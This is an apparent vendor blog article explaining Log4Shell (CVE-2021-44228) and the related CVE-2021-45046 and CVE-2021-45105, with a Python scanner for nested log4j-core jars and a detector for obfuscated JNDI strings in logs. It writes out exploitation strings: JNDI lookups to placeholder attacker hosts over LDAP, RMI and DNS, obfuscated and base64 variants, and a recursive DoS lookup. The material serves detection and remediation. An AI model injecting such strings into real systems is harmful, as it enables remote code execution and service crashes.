Insight
Friday, 14 January 2022
Log4Shell (CVE-2021-44228) is a software vulnerability in Apache Log4j 2, a popular Java library for logging application messages and errors. Any application that logs attacker-controlled input with an affected version (2.0-beta9 through 2.14.1) can be forced to contact a server of the attacker's choosing over JNDI and load code from it, which gives a remote, unauthenticated attacker control of the host. The vulnerability carries the maximum CVSS score of 10.0.
A chat message, a username, an HTTP header such as User-Agent, a text message relayed into a logging application: any string that ends up in a log statement is a potential vector, so the attacker never needs direct access to the server. When a vulnerable Log4j logs a string such as "${jndi:ldap://attacker.example/a}" (placeholder hostname), its lookup substitution performs a JNDI lookup against the attacker's LDAP server, which returns a reference to a remote class; Log4j loads and runs that class inside the application's process, and the server is compromised.
1. CVE-2021-45105
CVE-2021-45105 is the third vulnerability published against Apache Log4j 2 in the series that began with Log4Shell, and was rated 7.5 out of 10 (CVSS) when Apache disclosed it. An attacker who controls input that reaches lookup substitution (e.g., via the Thread Context Map) can build a self-referential lookup such as "${${::-${::-$${::-j}}}}" that Log4j's string substitution tries to resolve without bound, ending in a StackOverflowError, a process crash and a DoS (Denial of Service). Affected versions are 2.0-alpha1 through 2.16.0; it is fixed in 2.17.0 (2.12.3 for Java 7, 2.3.1 for Java 6).
The exposure exists only where the logging configuration passes attacker-controlled MDC data through lookup substitution, for example a PatternLayout containing a Context Lookup such as "$${ctx:loginId}". Although it lives in the same library as Log4Shell, it is not a variant of it: no JNDI lookup is involved, so removing JndiLookup.class (the stop-gap mitigation for CVE-2021-44228) does not address it; the recursion happens in the generic lookup mechanism.
2. CVE-2021-45046
Initially rated 3.7, and later raised to 9.0 once it was shown to permit remote code execution in some environments, this vulnerability affects Log4j 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0. According to Apache, the fix for Log4Shell shipped in 2.15.0 was incomplete in certain non-default configurations: an attacker can still craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DoS) or worse. It is fixed in 2.16.0 (2.12.2 for Java 7), which removes message lookups and disables JNDI by default.
The condition is a non-default Pattern Layout that routes Thread Context Map (MDC) input through lookup substitution, using either a Context Lookup pattern (e.g., "$${ctx:loginId}") or a Thread Context Map pattern (e.g., "%X", "%mdc" or "%MDC"). Where attackers control the MDC data (for instance because a request header is stored as the login ID), they can construct input that results in information leakage, DoS or, in some environments, remote code execution.
A single crafted string reaching the logger is enough to compromise a server, and if this happens to your company the damage can be severe. So, how can organizations avoid Log4Shell? These two steps are worth taking.
1. Identify the exposure to Log4Shell
Identifying Log4Shell exposure and addressing it should be the top priority for every security team. This means scanning the entire IT estate for Java code, regardless of whether your organization runs Windows, Linux or Mac servers, and checking whether it makes use of the Log4j library; note that log4j-core is often not a visible file but a dependency bundled inside WAR/EAR files, fat jars and vendor appliances, so a search by file name alone will miss copies. Wherever you find it, update Log4j to the latest patched release (2.17.0 or later fixes all three CVEs above). Where an upgrade cannot be done immediately, Apache's stop-gap is to remove JndiLookup.class from the jar, which addresses CVE-2021-44228 and CVE-2021-45046 but not CVE-2021-45105.
2. Apply vendor patches
Organizations must also keep an eye out for vendor patches and apply them as quickly as possible. However, because there are so many potential attack vectors for this exploit and patching every affected product will take time, it is also critical to have compensating controls in place for the interim: blocking outbound LDAP, LDAPS and RMI connections from application servers that have no business making them, and filtering "${jndi:" patterns at the network edge, with the caveat that the latter is easy to obfuscate and must not be the only control.
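The inventory step above is where most teams stumble, because log4j-core hides inside other archives. The following scanner is an added example written for this article (not Multimatics' or Apache's tooling): it walks a directory tree, opens every jar/war/ear, recurses into archives nested inside them, reads the version from the Maven pom.properties that log4j-core ships with, checks whether JndiLookup.class is still present, and maps the version to the three CVEs discussed above using the fixed-in releases from Apache's security advisories. The sample jars it builds are constructed stand-ins containing only the members the scanner reads, not real Log4j artifacts.

```python
"""Locate log4j-core on disk, including copies nested inside WAR/EAR/fat-jar archives,
read each copy's version and report which of the three CVEs above still apply to it."""
import io
import os
import re
import tempfile
import zipfile

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# First fixed release per CVE and per release line, from the Apache Log4j security page:
# 2.3.x (Java 6), 2.12.x (Java 7) and the main line (Java 8 and later).
FIXED_IN = {
    "CVE-2021-44228": {"2.3": (2, 3, 1), "2.12": (2, 12, 2), "main": (2, 15, 0)},
    "CVE-2021-45046": {"2.3": (2, 3, 1), "2.12": (2, 12, 2), "main": (2, 16, 0)},
    "CVE-2021-45105": {"2.3": (2, 3, 1), "2.12": (2, 12, 3), "main": (2, 17, 0)},
}

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a pre-release such as '2.0-beta9' collapses to (2, 0, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return tuple(int(n or 0) for n in m.groups()) if m else None

def affected_cves(version):
    """CVEs from the table above that apply to a log4j-core version string."""
    v = parse_version(version)
    if v is None or v[0] != 2:
        return []                      # Log4j 1.x and unparseable strings: out of scope here
    line = "2.3" if v[:2] == (2, 3) else "2.12" if v[:2] == (2, 12) else "main"
    return [cve for cve, fixes in FIXED_IN.items() if v < fixes[line]]

def inspect_archive(zf, path, findings):
    """Record a finding if this archive is log4j-core, then recurse into nested archives."""
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        m = re.search(r"^version=(.+)$", zf.read(POM_PROPS).decode("utf-8", "replace"), re.M)
        version = m.group(1).strip() if m else None
    if version is None:                # fall back to the conventional file name
        m = re.search(r"log4j-core-(\d[\w.\-]*)\.jar$", path)
        version = m.group(1) if m else None
    if version is not None or JNDI_CLASS in names:
        cves = affected_cves(version)
        if JNDI_CLASS not in names:
            # Deleting JndiLookup.class is Apache's stop-gap for the two JNDI CVEs; it does
            # nothing for the CVE-2021-45105 recursion bug, so that one stays listed.
            cves = [c for c in cves if c == "CVE-2021-45105"]
        findings.append({"path": path, "version": version,
                         "jndi_lookup_present": JNDI_CLASS in names, "cves": cves})
    for name in names:                 # fat jars, WARs and EARs carry jars inside them
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, path + "!" + name, findings)
            except zipfile.BadZipFile:
                continue

def scan_tree(root):
    """Walk a directory tree and inspect every archive in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(full) as zf:
                        inspect_archive(zf, full, findings)
                except zipfile.BadZipFile:
                    continue
    return findings

def make_jar(target, version, with_jndi=True):
    """Constructed stand-in for a log4j-core jar holding only the members the scanner reads."""
    with zipfile.ZipFile(target, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # placeholder bytes, not a real class

def build_sample_tree(root):
    """Constructed sample estate: unpatched, patched, unpatched-with-class-deleted, and a WAR."""
    make_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1")
    make_jar(os.path.join(root, "log4j-core-2.17.0.jar"), "2.17.0")
    make_jar(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), "2.14.1", with_jndi=False)
    inner = io.BytesIO()
    make_jar(inner, "2.16.0")
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", inner.getvalue())

def demo():
    """Build the sample tree in a temp dir, scan it and return {path relative to root: finding}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return {os.path.relpath(f["path"], tmp): f for f in scan_tree(tmp)}

if __name__ == "__main__":
    for rel, f in demo().items():
        state = "present" if f["jndi_lookup_present"] else "absent"
        print(f"{rel}: version {f['version']}, JndiLookup.class {state}, {f['cves'] or 'none of the three'}")
```

Point scan_tree at a real filesystem root instead of the sample tree to run it in anger. The nested path notation ("app.war!WEB-INF/lib/log4j-core-2.16.0.jar") tells the operator exactly which embedded copy needs the vendor's rebuilt artifact rather than a simple file replacement, and the JndiLookup column distinguishes hosts that received the stop-gap from hosts that were actually upgraded.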
To sum up, organizations should review their logs for suspicious activity. Bear in mind that an exploitation string is written to the log whether or not the platform runs a vulnerable version of Log4j: its presence proves an attempt, not a success, so correlate hits with outbound LDAP or RMI connections and unexpected child processes on the host. Ensuring that the IT team understands the Log4Shell vulnerabilities and that every installation of Log4j is updated to the latest version remains the most critical step in securing the organization.
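The log review above is harder than a grep for "${jndi:" because attackers obfuscate the string using Log4j's own lookup syntax. As an added example (not code from the original article or from Multimatics), the following Python normalizes constructed sample access-log lines the way Log4j would before matching: it URL-decodes them, peels nested lookups from the inside out, applies the lower/upper transforms, the ":-" default-value trick and the base64 lookup, and then reports every line that resolves to a JNDI lookup together with its scheme. The log lines, IP addresses and hostnames are constructed for the example.

```python
"""Scan web-server/application log lines for Log4Shell exploitation strings, including
the obfuscated forms attackers use to evade naive '${jndi:' greps."""
import base64
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no nested braces. Resolved inside-out, as Log4j does.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup over any scheme (ldap, ldaps, rmi, dns, iiop, ...), case-insensitive.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.\-]+)\s*:", re.I)

def _resolve(body):
    """Emulate the few lookup behaviours obfuscation relies on. Anything else is frozen
    with sentinel characters so it is reported as-is rather than expanded again."""
    if ":-" in body:                         # ${env:NOPE:-j}, ${::-j}: the default value wins
        return body.split(":-", 1)[1]
    key, sep, value = body.partition(":")
    key = key.lower()
    if sep and key == "lower":
        return value.lower()
    if sep and key == "upper":
        return value.upper()
    if sep and key == "base64":              # ${base64:...} yields the decoded text
        try:
            return base64.b64decode(value).decode("utf-8", "replace")
        except ValueError:
            pass
    return "\x01" + body + "\x02"

def decode_lookups(text, max_rounds=32):
    """Peel nested lookups until the text stops changing. The round limit matters because
    unbounded self-referential resolution is exactly the CVE-2021-45105 failure mode."""
    for _ in range(max_rounds):
        new = LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text.replace("\x01", "${").replace("\x02", "}")

def classify(line):
    """Decode one log line (URL-decoding first, since payloads arrive in request paths and
    headers) and say whether it carries a JNDI lookup and over which scheme."""
    decoded = decode_lookups(unquote(line))
    m = JNDI.search(decoded)
    return {
        "decoded": decoded,
        "has_lookup": "${" in decoded,       # any lookup in untrusted input deserves a look
        "jndi": m is not None,
        "scheme": m.group(1).lower() if m else None,
    }

def scan_log(text):
    """Return (line number, scheme, decoded line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        c = classify(line)
        if c["jndi"]:
            hits.append((n, c["scheme"], c["decoded"]))
    return hits

# Constructed sample access-log lines (not real traffic): a benign request, a plain payload,
# a case/nesting-obfuscated one, a URL-encoded one, a non-JNDI lookup, and a base64 one.
SAMPLE_LOG = """\
10.0.0.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"
10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET /login HTTP/1.1" 302 0 "-" "${${lower:j}${upper:n}di:${lower:rmi}://203.0.113.5:1099/x}"
10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fprobe.example%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.79"
10.0.0.3 - - [10/Dec/2021:14:02:16 +0000] "POST /api HTTP/1.1" 200 88 "-" "app ${env:HOME} check"
10.0.0.9 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" "${base64:JHtqbmRpOmxkYXA6Ly94fQ==}"
"""

if __name__ == "__main__":
    for n, scheme, decoded in scan_log(SAMPLE_LOG):
        print(f"line {n}: JNDI over {scheme}: {decoded}")
```

A hit means an attempt was logged, nothing more; the host may have been patched, or the string may have landed in a component that never passes it to Log4j. The scheme is the useful pivot for confirming success: search network telemetry for outbound connections from that host to the named server on the matching protocol in the seconds after the timestamp.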
Organizations must act quickly to defend their systems, since Log4Shell is both high-impact and trivial to exploit. Learn more about the Log4Shell vulnerability and Cybersecurity at Multimatics!
Reference:
A. (2021, December 21). CVE-2021-44228 vulnerability in Apache Log4j library. Securelist. https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/
Gorelik, M. (2021, December 17). Protecting Against the Log4j (Log4Shell) Vulnerability. Morphisec. https://blog.morphisec.com/protection-against-log4j-vulnerability-what-actions-to-take
Palazolo, G. (2021, December 20). CVE-2021-45105: New DoS Vulnerability Found in Apache Log4j. Netskope. https://www.netskope.com/blog/cve-2021-45105-new-dos-vulnerability-found-in-apache-log4j